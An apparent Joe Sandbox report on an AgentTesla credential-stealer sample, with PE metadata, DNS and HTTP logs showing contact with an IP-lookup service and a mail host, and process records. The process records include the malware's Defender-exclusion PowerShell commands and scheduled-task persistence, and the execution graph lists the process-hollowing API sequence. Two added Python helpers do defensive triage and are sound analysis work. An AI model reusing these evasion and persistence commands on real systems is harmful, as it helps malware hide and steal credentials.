                                                            Time Stamp:0x674E6970 [Tue Dec 3 02:14:08 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaba30 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x380d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa9a88 | 0xa9c00 | e81e99576977fa7cda0364fd60a2c546 | False | 0.934967265740059 | data | 7.794593073066602 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xac000 | 0x380d0 | 0x38400 | 776efce66aef4203e073a89f574e744f | False | 0.3072916666666667 | data | 5.218306193316651 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe6000 | 0xc | 0x400 | 4ef96ebdaed6b531509751ef26b10fd4 | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xac490 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | | | 0.38353658536585367
RT_ICON | 0xacaf8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | | | 0.48655913978494625
RT_ICON | 0xacde0 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | | | 0.5286885245901639
RT_ICON | 0xacfc8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | | | 0.5878378378378378
RT_ICON | 0xad0f0 | 0x6739 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9933017975402081
RT_ICON | 0xb382c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.5578358208955224
RT_ICON | 0xb46d4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.6367328519855595
RT_ICON | 0xb4f7c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.6497695852534562
RT_ICON | 0xb5644 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.47760115606936415
RT_ICON | 0xb5bac | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.125
RT_ICON | 0xc63d4 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.21113622030691612
RT_ICON | 0xcf87c | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | | | 0.21157894736842106
RT_ICON | 0xd6064 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | | | 0.24269870609981517
RT_ICON | 0xdb4ec | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.22325224374114314
RT_ICON | 0xdf714 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.3196058091286307
RT_ICON | 0xe1cbc | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.3642120075046904
RT_ICON | 0xe2d64 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.5086065573770492
RT_ICON | 0xe36ec | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5735815602836879
RT_GROUP_ICON | 0xe3b54 | 0x102 | data | | | 0.5697674418604651
RT_GROUP_ICON | 0xe3c58 | 0x14 | data | | | 1.05
RT_VERSION | 0xe3c6c | 0x278 | data | | | 0.46677215189873417
RT_MANIFEST | 0xe3ee4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 04:25:26.564809084 CET | 192.168.2.8 | 1.1.1.1 | 0xaf51 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:28.759499073 CET | 192.168.2.8 | 1.1.1.1 | 0x4483 | Standard query (0) | mail.iaa-airferight.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:52.219733953 CET | 192.168.2.8 | 1.1.1.1 | 0xbb98 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 04:25:26.571656942 CET | 1.1.1.1 | 192.168.2.8 | 0xaf51 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:26.571656942 CET | 1.1.1.1 | 192.168.2.8 | 0xaf51 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:26.571656942 CET | 1.1.1.1 | 192.168.2.8 | 0xaf51 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:28.770808935 CET | 1.1.1.1 | 192.168.2.8 | 0x4483 | No error (0) | mail.iaa-airferight.com | | 46.175.148.58 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:52.226701975 CET | 1.1.1.1 | 192.168.2.8 | 0xbb98 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                                            • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 104.26.12.205 | 443 | 6784 | C:\Users\user\Desktop\jKqPSehspS.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:25:27 UTC | 155 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: api.ipify.org
                                                            Connection: Keep-Alive
2025-01-11 03:25:27 UTC | 424 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 11 Jan 2025 03:25:27 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 12
                                                            Connection: close
                                                            Vary: Origin
                                                            CF-Cache-Status: DYNAMIC
                                                            Server: cloudflare
                                                            CF-RAY: 9001ccb5895e7289-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1819&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1596500&cwnd=238&unsent_bytes=0&cid=474d4a183d150a66&ts=249&x=0"
2025-01-11 03:25:27 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                            Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49711 | 104.26.12.205 | 443 | 7408 | C:\Users\user\AppData\Roaming\BLpvFR.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:25:31 UTC | 155 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: api.ipify.org
                                                            Connection: Keep-Alive
2025-01-11 03:25:31 UTC | 424 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 11 Jan 2025 03:25:31 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 12
                                                            Connection: close
                                                            Vary: Origin
                                                            CF-Cache-Status: DYNAMIC
                                                            Server: cloudflare
                                                            CF-RAY: 9001ccd24d228c3c-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1951&rtt_var=744&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1460000&cwnd=224&unsent_bytes=0&cid=2546c5f36ef920c3&ts=526&x=0"
2025-01-11 03:25:31 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                            Data Ascii: 8.46.123.189



                                                            Target ID:0
                                                            Start time:22:25:20
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\jKqPSehspS.exe"
                                                            Imagebase:0xce0000
                                                            File size:927'744 bytes
                                                            MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:22:25:22
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"
                                                            Imagebase:0xc70000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:22:25:22
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:22:25:23
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"
                                                            Imagebase:0xc70000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:22:25:23
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:22:25:23
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"
                                                            Imagebase:0xb90000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:22:25:23
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:22:25:24
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\jKqPSehspS.exe"
                                                            Imagebase:0xa90000
                                                            File size:927'744 bytes
                                                            MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:22:25:25
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            Imagebase:0x390000
                                                            File size:927'744 bytes
                                                            MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 91%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:22:25:26
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff605670000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:22:25:28
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp"
                                                            Imagebase:0xb90000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:22:25:28
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:22:25:29
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\BLpvFR.exe"
                                                            Imagebase:0x980000
                                                            File size:927'744 bytes
                                                            MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:false
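The process records above carry the three facts a responder reads out of this report by hand: a schtasks.exe /Create whose /XML task definition sits under AppData\Local\Temp, a second executable with the submitted sample's MD5 running from AppData\Roaming, and Yara rule hits on the live process. The following helper, added here as an example and not part of the Joe Sandbox report or its tooling, parses records in the layout used above (one "Key:Value" per line, "•" bullet lines under "Yara matches") and applies those three checks. SAMPLE_RECORDS is a constructed excerpt of the records on this page; SAMPLE_MD5 is the submitted file's MD5 as stated in the report; the tag names are my own.

```python
"""Triage of process records in the report layout (added example, not Joe Sandbox code)."""
import re
from typing import Dict, List, Union

Record = Dict[str, Union[str, List[str]]]

SAMPLE_MD5 = "3B1B99F3617BBE21D2BD1601E6CE73EE"  # submitted file's MD5, per the report

# Constructed excerpt of the report's process records, same layout as the page.
SAMPLE_RECORDS = """\
Target ID:7
Path:C:\\Windows\\SysWOW64\\schtasks.exe
Wow64 process (32bit):true
Commandline:"C:\\Windows\\System32\\schtasks.exe" /Create /TN "Updates\\BLpvFR" /XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmp89B.tmp"
MD5 hash:48C2FE20575769DE916F48EF0676A965

Target ID:10
Path:C:\\Users\\user\\AppData\\Roaming\\BLpvFR.exe
Wow64 process (32bit):true
Commandline:C:\\Users\\user\\AppData\\Roaming\\BLpvFR.exe
MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE

Target ID:14
Path:C:\\Users\\user\\AppData\\Roaming\\BLpvFR.exe
Commandline:"C:\\Users\\user\\AppData\\Roaming\\BLpvFR.exe"
MD5 hash:3B1B99F3617BBE21D2BD1601E6CE73EE
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:false
"""

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
ROAMING_DIR_RE = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)


def parse_records(text: str) -> List[Record]:
    """One dict per blank-line-separated block. 'Key:Value' splits on the first colon only
    (command lines keep theirs); an empty value opens a list that '•' bullet lines append to."""
    records: List[Record] = []
    current: Record = {}
    last_key = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
            current, last_key = {}, ""
            continue
        if line.startswith("•"):
            bucket = current.get(last_key)
            if isinstance(bucket, list):
                bucket.append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        current[key] = value if value else []
        last_key = key
    if current:
        records.append(current)
    return records


def scheduled_task_from_temp(rec: Record) -> bool:
    """schtasks.exe /Create ... /XML <file under Temp>: task definition staged in Temp."""
    path = str(rec.get("Path", "")).lower()
    cmd = str(rec.get("Commandline", ""))
    return (path.endswith("\\schtasks.exe") and "/create" in cmd.lower()
            and "/xml" in cmd.lower() and TEMP_DIR_RE.search(cmd) is not None)


def sample_copy_in_roaming(rec: Record, sample_md5: str) -> bool:
    """Same bytes as the submitted sample, but running from the user's Roaming profile."""
    return (str(rec.get("MD5 hash", "")).upper() == sample_md5.upper()
            and ROAMING_DIR_RE.search(str(rec.get("Path", ""))) is not None)


def yara_rules(rec: Record) -> List[str]:
    """Rule names from the 'Yara matches' bullets, in report order."""
    hits = rec.get("Yara matches", [])
    names: List[str] = []
    for hit in hits if isinstance(hits, list) else []:
        m = re.match(r"Rule:\s*([^,\s]+)", hit)
        if m:
            names.append(m.group(1))
    return names


def triage(text: str, sample_md5: str) -> List[dict]:
    """Run every check; return one finding per process that tripped at least one."""
    findings = []
    for rec in parse_records(text):
        tags = []
        if scheduled_task_from_temp(rec):
            tags.append("schtasks_xml_from_temp")
        if sample_copy_in_roaming(rec, sample_md5):
            tags.append("sample_copy_in_roaming")
        tags.extend("yara:" + name for name in yara_rules(rec))
        if tags:
            findings.append({"target": rec.get("Target ID"), "path": rec.get("Path"), "tags": tags})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS, SAMPLE_MD5):
        print(f"Target {f['target']}: {f['path']} -> {', '.join(f['tags'])}")
```

On the constructed excerpt this flags target 7 (task XML in Temp), target 10 (sample copy in Roaming) and target 14 (sample copy plus the AgentTesla Yara hit). The Temp check deliberately looks at the /XML argument rather than the schtasks.exe path, since the binary itself is the legitimate system copy in every record above.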


                                                              Execution Graph

                                                              Execution Coverage:11.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:245
                                                              Total number of Limit Nodes:11
execution_graph (node and edge list omitted; the original report renders it as an interactive graph). Win32 calls reached, with the calling node addresses taken from the graph:
• from the memory region at 0x7940000: CreateProcessA (7947068, 7947070), VirtualAllocEx (7946d20, 7946d28), WriteProcessMemory (7946de0, 7946de8), ReadProcessMemory (7946ed0, 7946ed8), Wow64SetThreadContext (7946c49, 7946c50), ResumeThread (7946791, 7946798, 794683f), PostMessageW (794693c)
• from the memory region at 0x1500000: DuplicateHandle (150cc40), CreateActCtxA (15044b4, 15058f8), GetModuleHandleW (1505df4, 150b308, 150cb78, 150d22f, 150d240)
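The API set the execution graph reaches from the region at 0x7940000 (CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread) is the classic process-hollowing sequence: spawn a child, write a payload into it, point its main thread at the payload, resume it. The graph shows which calls exist but not their runtime order, and the CreateProcessA flags are not visible here, so the helper below, added as an example and not part of the report or its tooling, works on a per-process call trace such as an API monitor or EDR would supply and checks only the ordering. SAMPLE_STUB_TRACE and BENIGN_LAUNCHER_TRACE are constructed traces, not captured from this sample; the stage names and the alternative API spellings (native Nt* calls, CreateProcessW) are my own additions to make the check usable beyond this one report.

```python
"""Ordered API-sequence check for process hollowing (added example, not from the report)."""
from typing import Dict, List, Tuple

# Required stages, in order; unrelated calls in between are skipped. Wow64SetThreadContext is
# what a 32-bit parent uses on a 32-bit child under WOW64, so it counts alongside SetThreadContext.
STAGES: List[Tuple[str, Tuple[str, ...]]] = [
    ("spawn", ("CreateProcessA", "CreateProcessW", "CreateProcessInternalW")),
    ("write", ("WriteProcessMemory", "NtWriteVirtualMemory")),
    ("context", ("SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread")),
    ("resume", ("ResumeThread", "NtResumeThread")),
]

# Calls that strengthen the verdict but are not required: some variants write over the
# existing image without allocating, and not all of them read the target's memory first.
SUPPORTING = ("VirtualAllocEx", "NtAllocateVirtualMemory", "ReadProcessMemory",
              "NtUnmapViewOfSection", "ZwUnmapViewOfSection")

# Constructed trace using the API names the execution graph lists for this sample.
SAMPLE_STUB_TRACE = [
    "CreateProcessA", "ReadProcessMemory", "VirtualAllocEx",
    "WriteProcessMemory", "WriteProcessMemory", "WriteProcessMemory",
    "Wow64SetThreadContext", "ResumeThread",
]
# Constructed trace of a benign launcher: spawns a child and waits for it.
BENIGN_LAUNCHER_TRACE = ["CreateProcessA", "WaitForSingleObject", "GetExitCodeProcess"]


def stages_reached(trace: List[str]) -> List[str]:
    """Stage labels matched in order. A call counts only once every earlier stage has
    been seen, so WriteProcessMemory before CreateProcessA does not advance the chain."""
    reached: List[str] = []
    nxt = 0
    for api in trace:
        if nxt < len(STAGES) and api in STAGES[nxt][1]:
            reached.append(STAGES[nxt][0])
            nxt += 1
    return reached


def supporting_calls(trace: List[str]) -> List[str]:
    """Supporting calls present, deduplicated, in order of first appearance."""
    seen: List[str] = []
    for api in trace:
        if api in SUPPORTING and api not in seen:
            seen.append(api)
    return seen


def classify(trace: List[str]) -> Dict[str, object]:
    """Verdict plus the evidence behind it, for a single process's call trace."""
    stages = stages_reached(trace)
    return {
        "stages": stages,
        "supporting": supporting_calls(trace),
        "hollowing": len(stages) == len(STAGES),
    }


if __name__ == "__main__":
    for name, trace in (("stub", SAMPLE_STUB_TRACE), ("launcher", BENIGN_LAUNCHER_TRACE)):
        print(name, classify(trace))
```

The benign launcher stops at the "spawn" stage, and a trace with the same calls in the wrong order is not escalated either; the supporting list (here ReadProcessMemory and VirtualAllocEx) is what to present alongside a positive verdict when the target process name and the CREATE_SUSPENDED flag are available from the sensor.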

                                                              Control-flow Graph

control_flow_graph (basic-block edge list and executed/not-executed colouring omitted; drawn interactively in the original report): function at 7947068, blocks numbered 0-57 spanning 7947068-79473b5; the only API call is CreateProcessA in block 79471ff-79472b9, whose two successors are 79472bb-79472c1 and 79472c2-7947348.
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079472A6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1539769716.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7940000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 1e4325e7655c4c7ad10781e0b0c38e649d2697b41385712ff2b5bbbb7c11e894
                                                              • Instruction ID: da1a4c29bb55d9e883d207111be97023848cba495670f671d3c796e1f12007a9
                                                              • Opcode Fuzzy Hash: 1e4325e7655c4c7ad10781e0b0c38e649d2697b41385712ff2b5bbbb7c11e894
                                                              • Instruction Fuzzy Hash: 7C914CB1D0031ADFEB24DFA8CC41BDDBBB6BB48314F1485A9D808A7280DB759985CF91

                                                              Control-flow Graph

control_flow_graph (basic-block edge list and executed/not-executed colouring omitted; drawn interactively in the original report): function at 7947070, blocks numbered 58-114 spanning 7947070-79473b5; the only API call is CreateProcessA in block 79471ff-79472b9, whose two successors are 79472bb-79472c1 and 79472c2-7947348.
                                                              APIs
